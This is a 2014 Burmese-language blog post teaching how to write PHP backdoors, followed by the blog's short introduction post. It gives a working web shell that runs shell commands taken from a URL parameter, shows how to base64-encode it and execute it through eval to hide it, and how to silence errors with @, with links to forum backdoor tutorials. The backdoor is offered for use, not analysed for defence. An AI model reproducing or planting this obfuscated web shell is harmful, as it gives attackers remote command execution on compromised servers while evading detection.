menu

Saturday, November 8, 2014

PHP Backdoors

PHP Backdoors အကြောင်းလေးပါ ။ အကြီးကြီးတော့မဟုတ်ပါဘူး ။ သိသလောက်လေးပြန်ရေးပေးထားတာပါ ။

အမှားပါခဲ့ရင်လည်း ကြိုတင်ပြီးတောင်းပန်ပါရစေ ။ ကျနော် PHP သိပ်မရလို့ ပါ ။ ဒီလိုဘဲလိုတာလေးလောက်နားလည်အောင်ကြည့်ကြည့်ပြီး စမ်းခဲ့တာဆိုတော့လေ ။ ကျနော်ပြောတဲ့ထဲမှာ မှားနေတဲ့အကြောင်းအရာလေးတွေများတွေ့ ခဲ့ရင်တော့ အားမနာဘဲ ၀င်ရောက်ထောက်ပြပေးဖို့  ပထမဆုံးတောင်းဆိုလိုက်ပါတယ် ညီအစ်ကိုတို့ ခများ ။

ဒါဆိုစလိုက်ရအောင်

ကျနော်တို့  Backdoor တစ်ခုအတွက် အရင်ဆုံး ဘယ် PHP Function တွေလိုအပ်မလဲ?
အောက်မှာကြည့်ကြည့်ပါ ။
- System(); // External Program တစ်ခုကို execute လုပ်ဖို့ အတွက်ပါ ။
- Exec(); // ဒါလည်း အတူတူပါဘဲ ။
- Fopen(); // ဒါကတော့ System မှာ file တစ်ခုကိုဖွင့်ဖို့ အတွက်ပါ ။
- Include(); // Includes a file to be executed.
- Eval(); // PHP Code တွေကို execute လုပ်ဖို့ အတွက်ပါ ။ .


ဒီ function တွေကိုသုံးပြီး input ကိုဖမ်းဖို့ ကျတော့ အောက်က code တွေတချက်ကြည့်ပါ ။
- $_GET['var']; // Receives input like: file.php?var=command
- $_POST['var']; // Receives input via the POST-parameter. (LiveHTTPHeaders can be used).
- $_COOKIE['var']; // Receives input via browser-cookies.

နောက်တစ်ဆင့်အနေနဲ့ တော့ ကျနော်တို့  backdoor ကို encode လုပ်မယ် ။

encode လုပ်ဖို့  နည်းတွေအများကြီးရှိပါတယ် ။ Shell code လိုမျိုး encode လုပ်မလား ။
base64 encode လုပ်မလား ။ ကြိုက်သလိုလုပ်လို့ တော့ရပါတယ် ။

Base64 နဲ့ ဘဲ encode လုပ်မယ်ဆိုပါတော့ ။
system() + $_GET[] + base64_encode()
အောက်က code ကို encode လုပ်ချင်တယ်ဆိုပါစို့ 

 <?php system($_GET['s3cr3t']); ?>

ဒီအောက်ကလိုပုံစံမျိုးနဲ့ လုပ်ပေးရပါမယ် ။
<?php
$var = "system(\$_GET['s3cr3t']);"; // $ needs to be escaped.
echo base64_encode($var);
?>


ဒီလို encode လုပ်ထားတဲ့ code ကိုအလုပ်လုပ်ဖို့ အတွက် ကျနော်တို့  decode ပြန်လုပ်ပေးရပါမယ် ။
 <?php
eval(base64_decode("c3lzdGVtKCRfR0VUWydzM2NyM3QnXSk7"));
?>


နောက်တစ်ခုသိထားရမှာလေး တစ်ခုကတော့ တခါတလေ system() ကိုသုံးတဲ့အခါမှာ error တက်လာတတ်ပါတယ် ။
ဒါကြောင့် ကျနော်တို့  @ ဆိုတဲ့အရာလေးကိုထည့်သုံးပေးရမယ် ။

ဒီလိုဆို အောက်က code လိုမျိုးဖြစ်သွားမယ် ။
<?php @system($_GET['server']); ?>

ဒီလောက်ဆို နားလည်ကြမယ်လို့ ထင်ပါတယ် ။ နောက်ပြီး  system() တို့  fopen() တို့ ကို implement လုပ်ပြီးတဲ့အခါမှာတော့
<pre></pre> tag ထဲမှာ output ထားကြပါတယ် ။ သုံးရလွယ်အောင်လို့ ပါ

Backdoor သုံးပုံသုံးနည်းလေးတွေ ကိုကရင်မရေးထားတာ ရှိပါတယ် ကြည့်ကြည့်လိုက်ပါ ။ ပိုနားလည်သွားပါလိမ့်မယ် ။
နောက်ပိုင်းအချိန်ရရင် ကျနော်ထပ်ရှာပြီး ရေးပေးပါမယ် ။

Backdoor tutorial by PHP_Killer
http://www.mmsecurity.net/forum/showthread.php?tid=1251

Backdoor Tutorial by Zin Aung
http://www.mmsecurity.net/forum/showthread.php?tid=336

Greetz: 133720 : maXe:

Thanks
rEvolt!

Thursday, November 6, 2014

Introduction

ကျနော့်အနေနဲ့  ဒီ Blog လေးကိုတည်ထောင်ခဲ့တဲ့ရည်ရွယ်ချက်ကတော့ ကျနော့်ရဲ့ သူငယ်ချင်းမိတ်ဆွေအားလုံး အပျင်းပြေ စေဖို့ ဘဲဖြစ်ဖြစ် ဗဟုသုတတိုးပွားစေဖို့ ဘဲဖြစ်ဖြစ် ရည်ရွယ်ပြီး စဖြစ်ခဲ့တာပါ ။ Categories တွေခွဲပြီး တင်ပေးသွားပါမယ် ။မိမိနှစ်သက်ရာကို ကြည့်ရှုနိုင်အောင် အတတ်နိုင်ဆုံးလုပ်ပေးသွားပါမယ်လို့  ပထမဆုံးပြောကြားခြင်းပါတယ် ။